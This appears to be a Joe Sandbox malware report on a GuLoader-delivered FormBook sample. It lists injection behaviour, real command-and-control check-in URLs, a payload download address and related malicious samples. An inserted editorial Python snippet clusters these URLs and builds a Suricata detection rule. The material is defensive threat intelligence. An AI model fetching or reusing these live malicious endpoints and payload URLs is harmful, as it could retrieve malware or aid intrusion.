    connects to: 103.72.68.128, port 50125 -> 80, FARIYA-PK Fariya Networks Pvt Ltd, PK, India
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (2, 5), injected
      connects to: www.nightoracle.com 103.224.212.210, port 50129 -> 80, TRELLIAN-AS-AP Trellian Pty Limited, AU, Australia; www.robertjamesfineclothing.com 104.247.82.51, port 50142 -> 80, TEAMINTERNET-CA-AS, CA, Canada; 9 other IPs or domains
      signature: System process connects to network (likely due to code injection or exploit)
      cmd.exe, started
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
        cmd.exe (1), started
          conhost.exe, started
      autofmt.exe, started

Source | Detection | Scanner | Label
jU0hAXFL0k.exe | 100% | Avira | HEUR/AGEN.1331786
jU0hAXFL0k.exe | 46% | Virustotal |
jU0hAXFL0k.exe | 32% | ReversingLabs | Win32.Trojan.Guloader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll | 0% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
shops.myshopify.com | 0% | Virustotal |

Source | Detection | Scanner | Label
http://www.mtauratarnt.com/rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 | 0% | Avira URL Cloud | safe
http://www.robertjamesfineclothing.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt | 0% | Avira URL Cloud | safe
http://www.juara102-azura.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM | 0% | Avira URL Cloud | safe
http://103.72.68.128/pcd/zkltfDHOiVw63.bin | 0% | Avira URL Cloud | safe
http://www.latitudeinformatics.com/rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe | 0% | Avira URL Cloud | safe
www.nightoracle.com/rs10/ | 0% | Avira URL Cloud | safe
http://www.thesoftwarepractitioner.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf | 0% | Avira URL Cloud | safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe
http://103.72.68.128/pcd/zkltfDHOiVw63.bin | 12% | Virustotal |
http://www.nightoracle.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g | 0% | Avira URL Cloud | safe
http://www.omarshafie.online/rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe | 0% | Avira URL Cloud | safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Virustotal |
http://www.laserhairremovalkit.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn | 0% | Avira URL Cloud | safe
http://www.fftsxxx.top/rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe | 100% | Avira URL Cloud | phishing
http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe
http://www.hdlive7.live/rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe | 0% | Avira URL Cloud | safe
www.nightoracle.com/rs10/ | 0% | Virustotal |
http://www.practicaloutsource.com/rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe | 0% | Avira URL Cloud | safe
Name  IP  Active  Malicious  Antivirus Detection  Reputation
www.fftsxxx.top  172.67.148.68  true  true  -  unknown
www.nightoracle.com  103.224.212.210  true  true  -  unknown
www.hdlive7.live  172.67.193.177  true  true  -  unknown
latitudeinformatics.com  3.33.130.190  true  true  -  unknown
www.electric-cars-19095.bond  104.247.82.90  true  true  -  unknown
www.mtauratarnt.com  172.67.210.176  true  true  -  unknown
www.omarshafie.online  66.96.162.133  true  true  -  unknown
www.juara102-azura.com  104.21.19.227  true  true  -  unknown
www.practicaloutsource.com  208.91.197.27  true  true  -  unknown
shops.myshopify.com  23.227.38.74  true  true  -  unknown
www.robertjamesfineclothing.com  104.247.82.51  true  true  -  unknown
assets.msn.com  unknown  unknown  false  -  high
www.metaastrologia.com  unknown  unknown  true  -  unknown
www.jwilkinsartscapeinc.com  unknown  unknown  true  -  unknown
www.latitudeinformatics.com  unknown  unknown  true  -  unknown
www.wgardsgm.live  unknown  unknown  true  -  unknown
www.thesoftwarepractitioner.com  unknown  unknown  true  -  unknown
www.kzjsm.com  unknown  unknown  true  -  unknown
www.laserhairremovalkit.com  unknown  unknown  true  -  unknown
www.calm-plants.com  unknown  unknown  true  -  unknown
Name  Malicious  Antivirus Detection  Reputation
http://www.juara102-azura.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM  true  Avira URL Cloud: safe  unknown
http://www.latitudeinformatics.com/rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe  true  Avira URL Cloud: safe  unknown
http://www.mtauratarnt.com/rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8  true  Avira URL Cloud: safe  unknown
http://www.robertjamesfineclothing.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt  true  Avira URL Cloud: safe  unknown
http://103.72.68.128/pcd/zkltfDHOiVw63.bin  true  12% Virustotal; Avira URL Cloud: safe  unknown
http://www.thesoftwarepractitioner.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf  true  Avira URL Cloud: safe  unknown
www.nightoracle.com/rs10/  true  0% Virustotal; Avira URL Cloud: safe  low
http://www.nightoracle.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g  true  Avira URL Cloud: safe  unknown
http://www.omarshafie.online/rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe  true  Avira URL Cloud: safe  unknown
http://www.laserhairremovalkit.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn  true  Avira URL Cloud: safe  unknown
http://www.fftsxxx.top/rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe  true  Avira URL Cloud: phishing  unknown
http://www.hdlive7.live/rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe  true  Avira URL Cloud: safe  unknown
http://www.practicaloutsource.com/rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe  true  Avira URL Cloud: safe  unknown
Name  Source  Malicious  Antivirus Detection  Reputation
http://nsis.sf.net/NSIS_Error  false  -  high
  Source: jU0hAXFL0k.exe, jU0hAXFL0k.exe, 00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp, jU0hAXFL0k.exe, 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214  false  0% Virustotal; Avira URL Cloud: safe  unknown
  Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.  false  Avira URL Cloud: safe  unknown
  Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
http://nsis.sf.net/NSIS_ErrorError  false  -  high
  Source: jU0hAXFL0k.exe, 00000005.00000000.2063367292434.0000000000409000.00000008.00000001.01000000.00000003.sdmp, jU0hAXFL0k.exe, 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
http://www.gopher.ftp://ftp.  false  Avira URL Cloud: safe  unknown
  Source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Legend (reputation bars): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs
IP  Domain  Country  ASN  ASN Name  Malicious
103.224.212.210  www.nightoracle.com  Australia  133618  TRELLIAN-AS-AP Trellian Pty Limited (AU)  true
172.67.193.177  www.hdlive7.live  United States  13335  CLOUDFLARENET (US)  true
103.72.68.128  unknown  India  45814  FARIYA-PK Fariya Networks Pvt Ltd (PK)  true
23.227.38.74  shops.myshopify.com  Canada  13335  CLOUDFLARENET (US)  true
208.91.197.27  www.practicaloutsource.com  Virgin Islands (British)  40034  CONFLUENCE-NETWORK-INC (VG)  true
66.96.162.133  www.omarshafie.online  United States  29873  BIZLAND-SD (US)  true
104.21.19.227  www.juara102-azura.com  United States  13335  CLOUDFLARENET (US)  true
172.67.210.176  www.mtauratarnt.com  United States  13335  CLOUDFLARENET (US)  true
104.247.82.51  www.robertjamesfineclothing.com  Canada  206834  TEAMINTERNET-CA-AS (CA)  true
172.67.148.68  www.fftsxxx.top  United States  13335  CLOUDFLARENET (US)  true
3.33.130.190  latitudeinformatics.com  United States  8987  AMAZONEXPANSION (GB)  true
104.247.82.90  www.electric-cars-19095.bond  Canada  206834  TEAMINTERNET-CA-AS (CA)  true
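Added editorial example; this is not Joe Sandbox code and not part of the sample. The URL and DNS tables above show the two FormBook traits worth pivoting on: one URI path (/rs10/) reused across many hosts, and a query string whose long value is a base64-like blob. The GuLoader payload fetch (http://103.72.68.128/pcd/zkltfDHOiVw63.bin) has neither, so a path-keyed rule separates the two stages. The Python below clusters the report's own URLs by path, joins the hosts to the resolved IPs, and emits a Suricata rule for the shared path. The URL and host data are copied from this page; the function names, the 40-character blob threshold, the rule wording and the sid are the editor's assumptions.

```python
"""Cluster FormBook-style check-in URLs by shared URI path and derive a
Suricata rule. Editorial example; not Joe Sandbox tooling. Input data are
copied from the report's URL and DNS tables; function names, the blob
length threshold and the rule sid are assumptions."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed from the report's URL table. The payload URL and the NSIS
# string are included deliberately as negatives.
REPORT_URLS = [
    "http://www.mtauratarnt.com/rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8",
    "http://www.robertjamesfineclothing.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt",
    "http://www.juara102-azura.com/rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM",
    "http://www.fftsxxx.top/rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe",
    "http://www.hdlive7.live/rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe",
    "http://103.72.68.128/pcd/zkltfDHOiVw63.bin",  # GuLoader payload fetch, not a beacon
    "http://nsis.sf.net/NSIS_Error",                # installer string, not a beacon
]

# Constructed from the report's DNS table: host -> resolved IP.
RESOLVED = {
    "www.fftsxxx.top": "172.67.148.68",
    "www.hdlive7.live": "172.67.193.177",
    "www.mtauratarnt.com": "172.67.210.176",
    "www.juara102-azura.com": "104.21.19.227",
    "www.robertjamesfineclothing.com": "104.247.82.51",
}

B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
MIN_BLOB_LEN = 40  # assumption; the blobs in this report are about 68 chars


def beacon_shape(url):
    """Return (host, path, query_keys) if the URL has the check-in shape seen
    in the report: a directory-style path plus a query whose longest value is
    a base64-like blob; None otherwise. The query is split by hand because
    urllib's parse_qsl would turn '+' into a space and break the check."""
    parts = urlsplit(url)
    if not parts.query or not parts.path.endswith("/"):
        return None
    pairs = [kv.split("=", 1) for kv in parts.query.split("&") if "=" in kv]
    if not pairs:
        return None
    blob = max((v for _, v in pairs), key=len)
    if len(blob) < MIN_BLOB_LEN or not set(blob) <= B64_CHARS:
        return None
    return parts.hostname, parts.path, sorted(k for k, _ in pairs)


def group_by_path(urls):
    """Cluster beacon URLs by URI path. One FormBook build uses one path across
    its whole host list, so the path survives host rotation and decoys."""
    groups = defaultdict(lambda: {"hosts": set(), "keys": set()})
    for url in urls:
        shape = beacon_shape(url)
        if shape is None:
            continue
        host, path, keys = shape
        groups[path]["hosts"].add(host)
        groups[path]["keys"].update(keys)
    return {p: {"hosts": sorted(g["hosts"]), "keys": sorted(g["keys"])}
            for p, g in groups.items()}


def ioc_table(groups, resolved):
    """Join each clustered host to its resolved IP; None means the sandbox saw
    no resolution, which is typical for the decoy entries in a FormBook list."""
    return {p: {h: resolved.get(h) for h in g["hosts"]} for p, g in groups.items()}


def suricata_rule(path, sid):
    """Build a Suricata rule alerting on a GET whose URI starts with the shared
    path followed by '?'. Rule text is the editor's; sid is an assumed local value."""
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any ('
        f'msg:"FormBook-style check-in, URI path {path}"; '
        'flow:established,to_server; http.method; content:"GET"; '
        f'http.uri; content:"{path}?"; startswith; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    groups = group_by_path(REPORT_URLS)
    table = ioc_table(groups, RESOLVED)
    for path, g in groups.items():
        print(path, "query keys:", g["keys"])
        for host, ip in table[path].items():
            print("  ", host, ip or "unresolved")
        print(suricata_rule(path, 9000001))
```

The path-keyed rule fires on hosts that are not in any blocklist yet, which matters because one build rotates through its whole domain list; the resolved-IP join then tells the responder which of those hosts were actually live during the run and should be blocked first.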
                                                Joe Sandbox Version:38.0.0 Ammolite
                                                Analysis ID:1326341
                                                Start date and time:2023-10-16 11:24:41 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 17m 41s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                                Run name:Suspected Instruction Hammering
Number of new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample file name:jU0hAXFL0k.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@446/13@24/12
                                                EGA Information:
                                                • Successful, ratio: 66.7%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 89
                                                • Number of non-executed functions: 321
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 173.222.162.186, 173.222.162.147, 173.222.162.174, 173.222.162.155, 209.197.3.8, 104.98.117.19, 104.98.117.40, 104.98.117.26, 104.98.117.10, 72.21.81.240, 173.222.162.167, 173.222.162.134, 173.222.162.163, 173.222.162.144, 173.222.162.145, 173.222.162.136, 173.222.162.190, 8.252.176.254, 8.240.193.126, 8.240.50.126, 8.252.176.126, 8.252.177.126, 104.98.117.42, 104.98.117.34
                                                • Excluded domains from analysis (whitelisted): assets.msn.com.edgekey.net, fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, e28578.d.akamaiedge.net, api.msn.com
• Execution Graph export aborted for target jU0hAXFL0k.exe, PID 8580 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time  Type  Description
11:29:18  API Interceptor  25925692x Sleep call for process: cmd.exe modified
11:29:28  API Interceptor  27876337x Sleep call for process: explorer.exe modified
Match  Associated Sample Name / URL  Detection  Threat Name  Context
103.224.212.210
  DHL-081023.exe  malicious  FormBook
    • www.joeysdoor.com/hesf/?APG0=swh0B3mpDGfIoIkFkBMBaZWoEXPEWkdnCE+a2KvQ5fM7xuJWfY5mF8tuq1PLwLxVobF5&MPkP=tV98bPH
103.72.68.128
  #U4e5d#U6708#U58f0#U660e_40981677.xls  malicious  GuLoader
    • 103.72.68.128/S1510M/smss.exe
  MaMsKRmgXZ.exe  malicious  FormBook, GuLoader
    • 103.72.68.128/pcd/wAYOlXAIjrMljL79.bin
  Part_number_91875-11400_x_6.xls  malicious  GuLoader
    • 103.72.68.128/M0910T/smss.exe
  SOA_OCT.xls  malicious  Unknown
    • 103.72.68.128/S0810M/smss.exe
  SOA_OCT.exe  malicious  FormBook, GuLoader
    • 103.72.68.128/pcd/ygcrnsVvq3.bin
23.227.38.74
  Vdxer5qjIX.exe  malicious  FormBook
    • www.familyfarmequipment.com/o6g2/?SBZ=nS9YWzFY3N6syAhbwoNBshoWv9LGSbS8x4bIAiF2evmS+jLDSfz0OyK3yknLqM4fqEnt&0rN8=9rNd98_pMt
  Order_No_455100.doc  malicious  FormBook, NSISDropper
    • www.modeparisiennefr.com/ge06/?BRr=1PQ6+z1zCuhiDtNSfWRWHzULIaSgIyGLxvhKDe40IO1yU7fcEEkK65M/Vi7JoYmvOisiHg==&3f=-ZoLnTC
  4XiBSHVMK9.exe  malicious  FormBook
    • www.easyhub.xyz/ur25/?yPJdZZPp=YgFlAXF+PF1M9NVblP9VwiavCVoYTH5qXsZlKIgMZf+jSBRRmW7+G4eG5ZtMpUZIxGFAPC2bwg==&1bz=ofut_N
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtf  malicious  FormBook
    • www.menofthehouse.store/o5gu/?Cz=qg/YE8tbqUGHlX9yn/532/da1RukGVzt5a7itCgYWzzXcdUnknjh6ulO/lFtjuestBs3FA==&bFQ=Y488S8qhX
  Ordem_de_compra_#PO358.exe  malicious  FormBook
    • www.casaalmafurniture.com/ey16/?xZED=gZ0vRgtzCg8Y9BjlioTXXGcpipSfchP6EsC108QsyUWTNpWLZXtls9A70lktVmrR4hUD&E8bHr=NjqDiB6XRrFpUP
  J7YKoy7RbeAhnI4.exe  malicious  FormBook
    • www.easyhub.xyz/ur25/?EtxdAx=YgFlAXEKPlw8g9Iv5/9VwiavCVoYTH5qXsZlKIgMZf+jSBRRmW7+G4eG5aB2qV1zyxkR&JtO=ipj4fvRPCntLCLp
  Order_No_455100.doc  malicious  FormBook, NSISDropper
    • www.mochibees-wylie.com/ge06/?efip3=hJkx0eH2QAKr/rM6zPsNviUHTBSqNLPfVhgpdMrR1UAGLx2aBw8r3vgSMp7elrAEYXkqhQ==&RfJ0=UP64Xzx04B
  SOA_OCT.exe  malicious  FormBook, GuLoader
    • www.speedgallery.shop/ro12/?Nj=q7bBtZk2sykpAEyGz2CbGdw5qDscegXZ29U5uCqOLaUnJObHOFuBSIyqgeyI0V5al5lx&sZ=mlbL
  aM5UQ76r9wuAL7I.exe  malicious  FormBook
    • www.lilypaddesigns.net/ur25/?9rm41fIX=O5zvqhT3r20qcpZxKsthuYcOsFbPQWrLBLvhbAYWoeFV+rVVf8vMu5EyAFD94b7I4iBh&w8=Cj3xr
  Erbnxrzwccndus.exe  malicious  DBatLoader, FormBook
    • www.memoncollections.com/ur25/?4h=6lI8KFRp2PH8Xpop&fjC8qrwh=iQyahbcy5mM237bhJ3zGhAOfvN/ThxY52mDKNHJoD580eHpkVjVd9k4i5mgiwbcqycFg
  DHL_AWB#607853880911.exe  malicious  FormBook
    • www.myfittedbedroomboutique.com/ny02/?8pn8KtAX=133R0CnGWmul9wxgZBJr3pPSNvbjPoM/uQ3G1JFVS7YytTW7zb3Fibf/3XDr8kIbASF5&l8lp=yT88iZYP2JYDYN
  bank_transfer_form_pdf.exe  malicious  FormBook, NSISDropper
    • www.itsamazingbarley.com/sn26/?JB4TTn=YCmew1F+qrSL1HJaaqny7ubluatMgI4p5GFh+S+UxHRjLMi+8q7wjczDGl9T1Q0zNXJh&r0=Z0G8Tj7hq8g
  Salary_Payment.exe  malicious  FormBook, NSISDropper
    • www.itsamazingbarley.com/sn26/?R4e=S2JxDhBX_Tg&Tln=YCmew1F+qrSL1HJaaqny7ubluatMgI4p5GFh+S+UxHRjLMi+8q7wjczDGmFDjBYLM3owJqdnnQ==
  SecuriteInfo.com.Gen.Variant.Nemesis.1781.26240.30029.exe  malicious  FormBook, NSISDropper
    • www.vandistreet.com/sy22/?WPg8=DheD&LhBD=ebYri2VS+8b128hqVJ3RboTDPGX+2LyTyMpXEk1yayhrShZanRmVL657Wy9d+vy4gGIg
  Yglwulsvxiiswr.exe  malicious  DBatLoader, FormBook
    • www.bakrinhome.com/fadc/?Cxo8s8nP=WzxPKrcwpJ+UcKgMi5ZaEytPZx0j3J8S2UE44nE9HQ/TD0Ip/aZRUYJLQvK3N6y/wx5K&zL34vl=dxoPlT7x5
  SecuriteInfo.com.Win32.Evo-gen.13846.3872.exe  malicious  FormBook, NSISDropper
    • www.vandistreet.com/sy22/?D8S=ebYri2VXirf12MlhVJ3RboTDPGX+2LyTyMpXEk1yayhrShZanRmVL657Wy9d+vy4gGIg&pL3=fdnDzzDhVr
  Tcnpdxsfourrbk.exe  malicious  DBatLoader, FormBook
    • www.shopthedivine.store/ao65/?rz=TbiKZIeExb96xO0j3iLjDcmyVAQpGTAzMcLHqprFjcxzmF0Uui3fx79VtOs3mAYABa0A&Ul=3fzh-V
  po#_72842.2023.xls  malicious  FormBook, NSISDropper
    • www.vandistreet.com/sy22/?3ftdq=ebYri2VSisfx2cptXJ3RboTDPGX+2LyTyMxHYnpzeShqSQ1cgB3Zd+B5VXRhlPGLvHdQXg==&3fRLPd=ltg4VHgXJNX
  borilpokonta2.1.exe  malicious  FormBook, NSISDropper
    • www.mochibees-wylie.com/ge06/?AlL=hJkx0eHzQHKv/7A2xPsNviUHTBSqNLPfVh45BP3Qx0AHLAacGgtnhrYQPP7hi74Pa3MM4tNPZQ==&QtC8nT=dnrlOzuxdlIl
  e-dekont.exe  malicious  FormBook, NSISDropper
    • www.arcofuss.com/k13s/?TX=gdiXBZ9XElo0j&NtBd-4=rpo4TzGpTXUxK+FsGvXQc9lk0KBvYELCKAocJLSwW5f5+ag5Bbtb8TAde2Dj44pa+hgA
Match  Associated Sample Name / URL  Detection  Threat Name  Context
shops.myshopify.com (context for every entry below: 23.227.38.74)
  Vdxer5qjIX.exe  malicious  FormBook
  Order_No_455100.doc  malicious  FormBook, NSISDropper
  4XiBSHVMK9.exe  malicious  FormBook
  http://lovekizoar.live  malicious  Unknown
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtf  malicious  FormBook
  Ordem_de_compra_#PO358.exe  malicious  FormBook
  J7YKoy7RbeAhnI4.exe  malicious  FormBook
  Order_No_455100.doc  malicious  FormBook, NSISDropper
  SOA_OCT.exe  malicious  FormBook, GuLoader
  SecuriteInfo.com.Trojan.Siggen21.37922.29840.21903.exe  malicious  DBatLoader, FormBook
  aM5UQ76r9wuAL7I.exe  malicious  FormBook
  Erbnxrzwccndus.exe  malicious  DBatLoader, FormBook
  DHL_AWB#607853880911.exe  malicious  FormBook
  bank_transfer_form_pdf.exe  malicious  FormBook, NSISDropper
  Salary_Payment.exe  malicious  FormBook, NSISDropper
  SecuriteInfo.com.Gen.Variant.Nemesis.1781.26240.30029.exe  malicious  FormBook, NSISDropper
  Yglwulsvxiiswr.exe  malicious  DBatLoader, FormBook
  SecuriteInfo.com.Win32.Evo-gen.13846.3872.exe  malicious  FormBook, NSISDropper
  Tcnpdxsfourrbk.exe  malicious  DBatLoader, FormBook
  po#_72842.2023.xls  malicious  FormBook, NSISDropper
Match  Associated Sample Name / URL  Detection  Threat Name  Context
TRELLIAN-AS-AP Trellian Pty Limited (AU)
  XP1XNeOXU0.exe  malicious  FormBook, DBatLoader  • 103.224.182.245
  http://oopatet.com/javascript/fingerprint/iife.min.js  malicious  Unknown  • 103.224.182.206
  http://oopatet.com  malicious  Unknown  • 103.224.182.16
  OwX3rXBIQT.exe  malicious  FormBook, NSISDropper  • 103.224.212.214
  mi1w8A8qUH.exe  malicious  FormBook, NSISDropper  • 103.224.182.252
  DHL-081023.exe  malicious  FormBook  • 103.224.182.242
  http://www.sciencepub123.com/unsubscribe  malicious  Unknown  • 103.224.182.240
  Payment_Advice.exe  malicious  FormBook  • 103.224.182.242
  http://energie-charts.info  malicious  Unknown  • 103.224.212.220
  http://evilserver.xyz  malicious  Babadeda, DarkSide  • 103.224.212.220
  http://oopatet.com/javascript/fingerprint/iife.min.js  malicious  Unknown  • 103.224.182.206
  http://mivcrosoft.com/  malicious  Unknown  • 103.224.182.246
  http://plirkep.com/jr.php  malicious  Unknown  • 103.224.182.206
  https://l.ead.me/beMg3r  malicious  HTMLPhisher  • 103.224.212.221
  po#_348839.exe  malicious  FormBook, NSISDropper  • 103.224.182.252
  schools_first_credit_card_responsibility_agreement_form_29662.js  malicious  Unknown  • 103.224.212.219
  Oder_VGMS123007.exe  malicious  FormBook, NSISDropper  • 103.224.182.252
  IDzTyPghZg.exe  malicious  Unknown  • 103.224.212.34
  QUOTATION.exe  malicious  FormBook, NSISDropper  • 103.224.182.252
  EFT_INVOICE.exe  malicious  FormBook, NSISDropper  • 103.224.182.252
CLOUDFLARENET (US)
  https://pub-87d66414183345baaa06b7793685d440.r2.dev/link-3.html  malicious  Unknown  • 104.18.2.35
  https://advanceds-ip-scanner.net  malicious  Unknown  • 1.1.1.1
  https://verifizieren-spk.com.de/  malicious  Unknown  • 1.1.1.1
  7ajp1lfDeg.exe  malicious  RedLine  • 104.21.93.225
  BakaNOkMD4.exe  malicious  Glupteba, RedLine  • 104.21.93.225
  Ks8DwCs4mT.exe  malicious  Xmrig  • 104.20.68.143
  BakaNOkMD4.exe  malicious  RedLine  • 104.21.93.225
  http://dynupdate.no-ip.com  malicious  Unknown  • 104.22.57.245
  7fSMGiQY2Q.exe  malicious  Amadey, Glupteba, RedLine  • 104.21.93.225
  https://rediforib.com  malicious  Unknown  • 1.1.1.1
  Advance_payment.doc  malicious  FormBook  • 104.21.53.238
